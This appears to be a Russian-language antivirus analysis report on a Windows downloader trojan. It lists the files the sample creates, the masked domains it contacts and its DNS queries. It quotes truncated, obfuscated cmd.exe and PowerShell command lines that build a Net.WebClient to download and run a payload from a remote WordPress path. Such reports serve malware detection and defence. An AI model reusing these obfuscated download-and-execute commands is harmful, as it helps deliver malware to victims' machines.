Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8\NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\334.exe
Сетевая активность
Подключается к
- '50##610.ru':80
- 'bi######ghiduong24h.info':80
- 'us###arm89.net':80
TCP
Запросы HTTP GET
- http://us###arm89.net/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK mh###.#nabledware.com
- DNS ASK ma######efalaringles.info
- DNS ASK 50##610.ru
- DNS ASK bi######ghiduong24h.info
- DNS ASK us###arm89.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8\NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set cX9o=T,ov7BUHrO'1=z@x3%s90ny):dVFhXmkI\i$Q+ .{up;wSc(Y8/NjaEfG4Ce}t2b5A~lDLW-M6PKgq&&for %e in (42;2;44;17;74;6;5;69;32;58;24;66;64;1;11;17;8;17;45;54;45;45;32;9;51;51;65;72;54;24;66;7...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $tkfdfi='sqblzlw';$fkshfzb=new-object Net.WebClient;$srtdjt='http://mh###.#nabledware.com/wp-content/upgrade/1Qvuku8g@http://m...
- '<SYSTEM32>\cmd.exe'
